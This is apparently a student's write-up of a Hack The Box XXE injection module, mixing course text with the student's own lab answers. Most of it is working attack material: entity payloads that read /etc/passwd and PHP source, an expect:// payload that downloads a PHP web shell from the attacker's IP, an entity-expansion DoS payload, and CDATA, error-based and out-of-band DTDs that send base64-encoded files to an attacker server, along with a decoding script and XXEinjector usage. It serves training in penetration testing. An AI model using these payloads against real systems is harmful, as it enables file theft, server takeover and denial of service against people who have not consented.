XML External Entity (XXE) Injection
Key | Definition | Example
Tag | The keys of an XML document, usually wrapped with (< / >) characters. | <date>
Entity | XML variables, usually wrapped with (& / ;) characters. | &lt;
Element | The root element or any of its child elements; its value is stored between a start-tag and an end-tag. | <date>01-01-2022</date>
Attribute | Optional specifications for any element that are stored in the tags, which may be used by the XML parser. | version="1.0" / encoding="UTF-8"
Declaration | Usually the first line of an XML document; defines the XML version and encoding to use when parsing it. | <?xml version="1.0" encoding="UTF-8"?>
Furthermore, some characters are used as part of an XML document structure, like <, >, &, or ". So, if we need to use them in an XML document, we should replace them with their corresponding entity references (e.g. &lt;, &gt;, &amp;, &quot;). Finally, we can write comments in XML documents between <!-- and -->, similar to HTML documents.
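As a small illustration of the entity references above, here is a minimal Python sketch that escapes and unescapes the four structural characters with the standard library. The helper names `xml_escape` and `xml_unescape` are hypothetical wrappers introduced only for this example.

```python
from xml.sax.saxutils import escape, unescape


def xml_escape(text: str) -> str:
    """Replace XML structural characters with their entity references."""
    # escape() handles &, < and > by default; the double quote is added explicitly.
    return escape(text, {'"': "&quot;"})


def xml_unescape(text: str) -> str:
    """Reverse xml_escape(): turn entity references back into raw characters."""
    return unescape(text, {"&quot;": '"'})


raw = 'a < b && c > "d"'
escaped = xml_escape(raw)
print(escaped)
print(xml_unescape(escaped) == raw)
```

The escaped string can be placed inside an element value without breaking the document structure.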
Local File Disclosure
Identifying
The first step in identifying potential XXE vulnerabilities is finding web pages that accept XML user input. We can start the exercise at the end of this section, which has a Contact Form:

If we fill the contact form and click on Send Data, then intercept the HTTP request with Burp, we get the following request:

As we can see, the form appears to be sending our data in an XML format to the web server, making this a potential XXE testing target. Suppose the web application uses outdated XML libraries, and it does not apply any filters or sanitization on our XML input. In that case, we may be able to exploit this XML form to read local files.
If we send the form without any modification, we get the following message:

We see that the value of the email element is being displayed back to us on the page. To print the content of an external file to the page, we should note which elements are being displayed, so that we know which elements to inject into. In some cases, no elements may be displayed, which we will cover how to exploit in the upcoming sections.
For now, we know that whatever value we place in the <email></email> element gets displayed in the HTTP response. So, let us try to define a new entity and then use it as a variable in the email element to see whether it gets replaced with the value we defined.
<!DOCTYPE email [
<!ENTITY company "Inlane Freight">
]>
Note: In our example, the XML input in the HTTP request had no DTD declared within the XML data itself or referenced externally, so we added a new DTD before defining our entity. If the DOCTYPE was already declared in the XML request, we would just add the ENTITY element to it.
Now, we should have a new XML entity called company, which we can reference with &company;. So, instead of using our email in the email element, let us try using &company;, and see whether it will be replaced with the value we defined (Inlane Freight):

As we can see, the response did use the value of the entity we defined (Inlane Freight) instead of displaying &company;, indicating that we may inject XML code. In contrast, a non-vulnerable web application would display (&company;) as a raw value. This confirms that we are dealing with a web application vulnerable to XXE.
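The substitution we observed is ordinary XML parser behavior, which can be reproduced locally. The sketch below is an illustration only: it uses Python's standard `xml.etree.ElementTree` rather than the target's PHP parser, and the `reflected_email` helper is a hypothetical stand-in for the page echoing the email element.

```python
import xml.etree.ElementTree as ET

# Same internal entity as in the payload above, placed in a small test document.
DOCUMENT = """<!DOCTYPE email [
  <!ENTITY company "Inlane Freight">
]>
<root>
  <name>test</name>
  <email>&company;</email>
</root>"""


def reflected_email(xml_text: str) -> str:
    """Parse the document and return the email value, as the page would echo it."""
    root = ET.fromstring(xml_text)
    return root.findtext("email")


print(reflected_email(DOCUMENT))  # Inlane Freight
```

The parser replaces the entity reference before the application ever sees the value, which is why the response shows the entity's content instead of the literal reference.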
Note: Some web applications may default to a JSON format in HTTP requests, but may still accept other formats, including XML. So, even if a web app sends requests in a JSON format, we can try changing the Content-Type header to application/xml, and then convert the JSON data to XML with an online tool. If the web application does accept the request with XML data, then we may also test it against XXE vulnerabilities, which may reveal an unanticipated XXE vulnerability.
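Instead of an online tool, the conversion can also be done locally. The following is a minimal sketch, assuming the JSON body is a flat object of string-like values; the `json_to_xml` helper and the `root` wrapper element name are assumptions for illustration, and the real element names depend on what the target application expects.

```python
import json
import xml.etree.ElementTree as ET


def json_to_xml(json_text: str, root_tag: str = "root") -> str:
    """Convert a flat JSON object into an XML document with one element per key."""
    data = json.loads(json_text)
    root = ET.Element(root_tag)
    for key, value in data.items():
        child = ET.SubElement(root, key)
        child.text = str(value)
    # encoding="unicode" returns a str without an XML declaration.
    return ET.tostring(root, encoding="unicode")


body = json_to_xml('{"name": "test", "email": "test@example.com"}')
print(body)
```

Nested objects and arrays would need extra handling, which this sketch deliberately leaves out.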
Reading Sensitive Files
Now that we can define new internal XML entities, let's see if we can define external XML entities. Doing so is fairly similar to what we did earlier, but we'll just add the SYSTEM keyword and define the external reference path after it, as we have learned in the previous section:
<!DOCTYPE email [
<!ENTITY company SYSTEM "file:///etc/passwd">
]>
Let us now send the modified request and see whether the value of our external XML entity gets set to the file we reference:

We see that we did indeed get the content of the /etc/passwd file, meaning that we have successfully exploited the XXE vulnerability to read local files. This enables us to read the content of sensitive files, like configuration files that may contain passwords or other sensitive files like an id_rsa SSH key of a specific user, which may grant us access to the back-end server. We can refer to the File Inclusion / Directory Traversal module to see what attacks can be carried out through local file disclosure.
Tip: In certain Java web applications, we may also be able to specify a directory instead of a file, and we will get a directory listing instead, which can be useful for locating sensitive files.
Reading Source Code
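Another benefit of local file disclosure is the ability to obtain the source code of the web application. This would allow us to perform a Whitebox Penetration Test to unveil more vulnerabilities in the web application, or at the very least reveal secret configurations like database passwords or API keys.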
So, let us see if we can use the same attack to read the source code of the index.php file, as follows:

As we can see, this did not work, as we did not get any content. This happened because the file we are referencing is not in a proper XML format, so it fails to be referenced as an external XML entity. If a file contains some of XML's special characters (e.g. <, >, or &), it would break the external entity reference and not be used for the reference.
Luckily, PHP provides wrapper filters that allow us to base64 encode certain resources (including files), in which case the final base64 output should not break the XML format. To do so, instead of using file:// as our reference, we will use PHP's php://filter/ wrapper. With this filter, we can specify the convert.base64-encode encoder as our filter, and then add an input resource (e.g. resource=index.php), as follows:
<!DOCTYPE email [
<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php">
]>
With that, we can send our request, and we will get the base64 encoded string of the index.php file:

We can select the base64 string, click on Burp's Inspector tab (on the right pane), and it will show us the decoded file. For more on PHP filters, you can refer to the File Inclusion / Directory Traversal module.
This trick only works with PHP web applications.
Remote Code Execution with XXE
In addition to reading local files, we may be able to gain code execution over the remote server. The easiest method would be to look for SSH keys, or attempt to utilize a hash stealing trick in Windows-based web applications, by making a call to our server. If these do not work, we may still be able to execute commands on PHP-based web applications through PHP's expect:// wrapper, though this requires the PHP expect module to be installed and enabled.
If the XXE directly prints its output (as shown in this section), then we can execute basic commands such as expect://id, and the page should print the command output.
The most efficient method to turn XXE into RCE is to fetch a web shell from our server and write it to the web app, after which we can interact with it to execute commands:
eldeim@htb[/htb]$ echo '<?php system($_REQUEST["cmd"]);?>' > shell.php
eldeim@htb[/htb]$ sudo python3 -m http.server 80
Now, we can use the following XML code to execute a curl command that downloads our web shell into the remote server:
<?xml version="1.0"?>
<!DOCTYPE email [
<!ENTITY company SYSTEM "expect://curl$IFS-O$IFS'OUR_IP/shell.php'">
]>
<root>
<name></name>
<tel></tel>
<email>&company;</email>
<message></message>
</root>
Note: We replaced all spaces in the above XML code with $IFS, to avoid breaking the XML syntax. Furthermore, many other characters like |, >, and { may break the code, so we should avoid using them.
Once we send the request, we should receive a request on our machine for the shell.php file, after which we can interact with the web shell on the remote server for code execution.
Note: The expect module is not enabled/installed by default on modern PHP servers, so this attack may not always work. This is why XXE is usually used to disclose sensitive local files and source code, which may reveal additional vulnerabilities or ways to gain code execution.
Other XXE Attacks
The Server-Side Attacks module thoroughly covers SSRF, and the same techniques can be carried out with XXE attacks.
Finally, one common use of XXE attacks is causing a Denial of Service (DoS) to the hosting web server, using the following payload:
<?xml version="1.0"?>
<!DOCTYPE email [
<!ENTITY a0 "DOS" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
<!ENTITY a5 "&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;">
<!ENTITY a6 "&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;">
<!ENTITY a7 "&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;">
<!ENTITY a8 "&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;">
<!ENTITY a9 "&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;">
<!ENTITY a10 "&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;">
]>
<root>
<name></name>
<tel></tel>
<email>&a10;</email>
<message></message>
</root>
This payload defines the a0 entity as DOS, references it in a1 multiple times, references a1 in a2, and so on until the back-end server's memory runs out due to the nested entity expansion. However, this attack no longer works with modern web servers (e.g., Apache), as they protect against this kind of entity self-reference. Try it against this exercise, and see if it works.
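To see why the payload is so expensive, we can work out the size of the fully expanded a10 entity. The sketch below is plain arithmetic under the payload's own numbers (a 3-character base value, 10 references per level, 10 levels); the `expanded_length` function name is hypothetical.

```python
def expanded_length(base: str, refs_per_level: int, levels: int) -> int:
    """Length of the top-level entity once every nested reference is expanded."""
    # Each level repeats the previous level refs_per_level times.
    return len(base) * refs_per_level ** levels


size = expanded_length("DOS", 10, 10)
print(size)          # 30000000000
print(size / 10**9)  # size in billions of characters
```

A request body of well under a kilobyte would therefore expand to roughly 30 billion characters in a parser that does not limit entity expansion.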
PoCs - Questions
Try to read the content of the 'connection.php' file, and submit the value of the 'api_key' as the answer
First, I intercepted the request and looked at the body:


I can see that it reflects my email back, so I will use that element to identify the XXE:
<!DOCTYPE email [
<!ENTITY company "Inlane Freight">
]>

Nice! Now I will try to make it return the /connection.php file:


Advanced File Disclosure
Advanced Exfiltration with CDATA
To output data that does not conform to the XML format, we can wrap the content of the external file reference with a CDATA tag (e.g. <![CDATA[ FILE_CONTENT ]]>). This way, the XML parser would consider this part raw data, which may contain any type of data, including any special characters.
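The effect of a CDATA section can be checked locally with any XML parser. This is a minimal sketch using Python's standard `xml.etree.ElementTree`; the `SNIPPET` value is a made-up piece of PHP-like text chosen because it contains < and &, and `parses` is a hypothetical helper.

```python
import xml.etree.ElementTree as ET

# Made-up source-like text containing characters that are special in XML.
SNIPPET = 'if ($a < 1 && $b) { echo "<b>"; }'


def parses(xml_text: str) -> bool:
    """Return True if the text is well-formed XML, False otherwise."""
    try:
        ET.fromstring(xml_text)
        return True
    except ET.ParseError:
        return False


raw = f"<email>{SNIPPET}</email>"
wrapped = f"<email><![CDATA[{SNIPPET}]]></email>"

print(parses(raw))      # the unescaped < and & break the document
print(parses(wrapped))  # the same text inside CDATA is accepted
print(ET.fromstring(wrapped).text)
```

The only sequence a CDATA section cannot contain is its own terminator, ]]>.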
One easy way to tackle this issue would be to define a begin internal entity with <![CDATA[, an end internal entity with ]]>, and then place our external entity file in between, so that it is considered a CDATA element, as follows:
<!DOCTYPE email [
<!ENTITY begin "<![CDATA[">
<!ENTITY file SYSTEM "file:///var/www/html/submitDetails.php">
<!ENTITY end "]]>">
<!ENTITY joined "&begin;&file;&end;">
]>
After that, if we reference the &joined; entity, it should contain our escaped data. However, this will not work, since XML prevents joining internal and external entities, so we will have to find a better way to do so.
To bypass this limitation, we can utilize XML Parameter Entities, a special type of entity that starts with a % character and can only be used within the DTD. What's unique about parameter entities is that if we reference them from an external source (e.g., our own server), then all of them would be considered as external and can be joined, as follows:
<!ENTITY joined "%begin;%file;%end;">
So, let's try to read the submitDetails.php file by first storing the above line in a DTD file (e.g. xxe.dtd), hosting it on our machine, and then referencing it as an external entity on the target web application, as follows:
eldeim@htb[/htb]$ echo '<!ENTITY joined "%begin;%file;%end;">' > xxe.dtd
eldeim@htb[/htb]$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Now, we can reference our external entity (xxe.dtd) and then print the &joined; entity we defined above, which should contain the content of the submitDetails.php file, as follows:
<!DOCTYPE email [
<!ENTITY % begin "<![CDATA["> <!-- prepend the beginning of the CDATA tag -->
<!ENTITY % file SYSTEM "file:///var/www/html/submitDetails.php"> <!-- reference external file -->
<!ENTITY % end "]]>"> <!-- append the end of the CDATA tag -->
<!ENTITY % xxe SYSTEM "http://OUR_IP:8000/xxe.dtd"> <!-- reference our external DTD -->
%xxe;
]>
...
<email>&joined;</email> <!-- reference the &joined; entity to print the file content -->
Once we write our xxe.dtd file, host it on our machine, and then add the above lines to our HTTP request to the vulnerable web application, we can finally get the content of the submitDetails.php file:

Note: In some modern web servers, we may not be able to read some files (like index.php), as the web server would be preventing a DOS attack caused by file/entity self-reference (i.e., XML entity reference loop), as mentioned in the previous section.
This trick can become very handy when the basic XXE method does not work or when dealing with other web development frameworks. Try to use this trick to read other files.
Error Based XXE
First, let's try to send malformed XML data, and see if the web application displays any errors. To do so, we can delete any of the closing tags, change one of them so that it does not close (e.g. <roo> instead of <root>), or just reference a non-existing entity, as follows:

If the web application displays such errors, we can abuse them to exfiltrate file content. To do so, we will use a similar technique to what we used earlier. First, we will host a DTD file that contains the following payload:
<!ENTITY % file SYSTEM "file:///etc/hosts">
<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">
The above payload defines the file parameter entity and then joins it with an entity that does not exist. In our previous exercise, we were joining three strings. In this case, %nonExistingEntity; does not exist, so the web application would throw an error saying that this entity does not exist, along with our joined %file; as part of the error. There are many other variables that can cause an error, like a bad URI or having bad characters in the referenced file.
Now, we can call our external DTD script, and then reference the error entity, as follows:
<!DOCTYPE email [
<!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
%remote;
%error;
]>
Once we host our DTD script as we did earlier and send the above payload as our XML data (no need to include any other XML data), we will get the content of the /etc/hosts file as follows:

This method may also be used to read the source code of files. All we have to do is change the file name in our DTD script to point to the file we want to read (e.g. "file:///var/www/html/submitDetails.php"). However, this method is not as reliable as the previous method for reading source files, as it may have length limitations, and certain special characters may still break it.
PoCs - Questions
Use either method from this section to read the flag at '/flag.php'. (You may use the CDATA method at '/index.php', or the error-based method at '/error').
First, I tried a basic CDATA payload, but it did not work:
<!DOCTYPE email [
<!ENTITY % begin "<![CDATA[">
<!ENTITY % file SYSTEM "file:///flag.txt">
<!ENTITY % end "]]>">
<!ENTITY % xxe SYSTEM "http://10.10.15.156:8000/xxe.dtd">
%xxe;
]>

So I tried error-based XXE. First, I removed the root tags to see whether the application displays errors:

It did not return any error, so I created the external DTD for the CDATA method and hosted it:
echo '<!ENTITY joined "%begin;%file;%end;">' > xxe.dtd
##
python3 -m http.server 8000
Then I modified the request to reference my hosted DTD:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
<!ENTITY % begin "<![CDATA[">
<!ENTITY % file SYSTEM "file:///flag.txt">
<!ENTITY % end "]]>">
<!ENTITY % xxe SYSTEM "http://10.10.15.156:8000/xxe.dtd">
%xxe;
]>
<root>
<name>test</name>
<tel>12345</tel>
<email>&joined;</email>
<message>test</message>
</root>
NOTE: We refer to &joined;, which is the name of the entity defined in our hosted DTD.

That did not work either, so I switched to the error-based method and changed the URL to /error/...:

So now I will create a DTD, host it, and then call it from the request:
## Create exploit.dtd
<!ENTITY % file SYSTEM "file:///flag.php">
<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">
## then
python3 -m http.server 8000
NOTE: Save the XML above into exploit.dtd before starting the server.

<!DOCTYPE email [
<!ENTITY % remote SYSTEM "http://10.10.15.156:8000/exploit.dtd">
%remote;
%error;
]>
&remote;

Blind Data Exfiltration
For fully blind cases, where the web application returns neither the value of our XML entities nor any error messages, we can utilize a method known as Out-of-band (OOB) Data Exfiltration, which is often used in similar blind cases with many web attacks, like blind SQL injections, blind command injections, blind XSS, and of course, blind XXE. Both the Cross-Site Scripting (XSS) and the Whitebox Pentesting 101: Command Injections modules discussed similar attacks, and here we will utilize a similar attack, with slight modifications to fit our XXE vulnerability.
In our previous attacks, we already utilized an out-of-band technique, since we hosted the DTD file on our machine and made the web application connect to us (hence out-of-band).
Out-of-band Data Exfiltration
To make the web application send the file content to our server, we can first use a parameter entity for the content of the file we are reading while utilizing a PHP filter to base64 encode it. Then, we will create another external parameter entity that references our IP, and place the file parameter value as part of the URL being requested over HTTP, as follows:
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">
If, for example, the file we want to read had the content of XXE_SAMPLE_DATA, then the file parameter would hold its base64 encoded data (WFhFX1NBTVBMRV9EQVRB). When the XML tries to reference the external oob parameter from our machine, it will request http://OUR_IP:8000/?content=WFhFX1NBTVBMRV9EQVRB. Finally, we can decode the WFhFX1NBTVBMRV9EQVRB string to get the content of the file. We can even write a simple PHP script that automatically detects the encoded file content, decodes it, and outputs it to the terminal:
<?php
if(isset($_GET['content'])){
error_log("\n\n" . base64_decode($_GET['content']));
}
?>
So, we will first write the above PHP code to index.php, and then start a PHP server on port 8000, as follows:
eldeim@htb[/htb]$ vi index.php # here we write the above PHP code
eldeim@htb[/htb]$ php -S 0.0.0.0:8000
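If we only have a plain request log (for example from python3 -m http.server) rather than the PHP script, the same decoding can be done afterwards. The following is a minimal sketch, assuming the logged request target looks like /?content=...; the `decode_exfiltrated` function is a hypothetical helper, not part of any tool used in this section.

```python
import base64
from urllib.parse import parse_qs, urlsplit


def decode_exfiltrated(request_target: str, param: str = "content") -> str:
    """Extract the base64 value of `param` from a request target and decode it."""
    query = urlsplit(request_target).query
    values = parse_qs(query).get(param)
    if not values:
        return ""
    # parse_qs turns a literal "+" into a space; base64 uses "+", so undo that.
    encoded = values[0].replace(" ", "+")
    # Restore any padding that was lost in transit.
    encoded += "=" * (-len(encoded) % 4)
    return base64.b64decode(encoded).decode("utf-8", errors="replace")


print(decode_exfiltrated("/?content=WFhFX1NBTVBMRV9EQVRB"))  # XXE_SAMPLE_DATA
```

Requests without the parameter, such as the initial fetch of /xxe.dtd, simply yield an empty string.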
Now, to initiate our attack, we can use a similar payload to the one we used in the error-based attack, and simply add <root>&content;</root>, which is needed to reference our entity and have it send the request to our machine with the file content:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
<!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
%remote;
%oob;
]>
<root>&content;</root>
Then, we can send our request to the web application:

Finally, we can go back to our terminal, and we will see that we did indeed get the request and its decoded content:
PHP 7.4.3 Development Server (http://0.0.0.0:8000) started
10.10.14.16:46256 Accepted
10.10.14.16:46256 [200]: (null) /xxe.dtd
10.10.14.16:46256 Closing
10.10.14.16:46258 Accepted
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...SNIP...
Tip: In addition to storing our base64 encoded data as a parameter to our URL, we may utilize DNS OOB Exfiltration by placing the encoded data as a sub-domain for our URL (e.g. ENCODEDTEXT.our.website.com), and then use a tool like tcpdump to capture any incoming traffic and decode the sub-domain string to get the data. Granted, this method is more advanced and requires more effort to exfiltrate data through.
Automated OOB Exfiltration
Although in some instances we may have to use the manual method we learned above, in many other cases, we can automate the process of blind XXE data exfiltration with tools. One such tool is XXEinjector. This tool supports most of the tricks we learned in this module, including basic XXE, CDATA source exfiltration, error-based XXE, and blind OOB XXE.
To use this tool for automated OOB exfiltration, we can first clone the tool to our machine, as follows:
eldeim@htb[/htb]$ git clone https://github.com/enjoiz/XXEinjector.git
Cloning into 'XXEinjector'...
...SNIP...
Once we have the tool, we can copy the HTTP request from Burp and write it to a file for the tool to use. We should not include the full XML data, only the first line, and write XXEINJECT after it as a position locator for the tool:
POST /blind/submitDetails.php HTTP/1.1
Host: 10.129.201.94
Content-Length: 169
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: http://10.129.201.94
Referer: http://10.129.201.94/blind/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
XXEINJECT
Now, we can run the tool with the --host/--httpport flags being our IP and port, the --file flag being the file we wrote above, and the --path flag being the file we want to read. We will also select the --oob=http and --phpfilter flags to repeat the OOB attack we did above, as follows:
eldeim@htb[/htb]$ ruby XXEinjector.rb --host=[tun0 IP] --httpport=8000 --file=/tmp/xxe.req --path=/etc/passwd --oob=http --phpfilter
...SNIP...
[+] Sending request with malicious XML.
[+] Responding with XML for: /etc/passwd
[+] Retrieved data:
We see that the tool did not directly print the data. This is because we are base64 encoding the data, so it does not get printed. In any case, all exfiltrated files get stored in the Logs folder under the tool, and we can find our file there:
eldeim@htb[/htb]$ cat Logs/10.129.201.94/etc/passwd.log
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...SNIP...
Try to use the tool to repeat other XXE methods we learned.
PoCs - Questions
Using Blind Data Exfiltration on the '/blind' page to read the content of '/327a6c4304ad5938eaf0efb6cc3e53dc.php' and get the flag.
First, I captured a request to the /blind endpoint:

Then I tried to perform an OOB XXE. First, I created a DTD that reads the file I wanted through a base64 filter and sends its content to my server:
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/327a6c4304ad5938eaf0efb6cc3e53dc.php">
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://10.10.15.156:8000/?content=%file;'>">
Then I saved it into oob_xxe.dtd. Afterwards, I created a simple PHP script that automatically decodes any data I receive on port 8000:
<?php
if(isset($_GET['content'])){
error_log("\n\n" . base64_decode($_GET['content']));
}
?>
I saved it into index.php. Then I started a PHP server with:
php -S 0.0.0.0:8000
Now I modified the request to call the external entity and forward the output to my PHP server:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE email [ <!ENTITY % remote SYSTEM "http://10.10.15.156:8000/oob_xxe.dtd"> %remote; %oob;]><root>&content;</root>

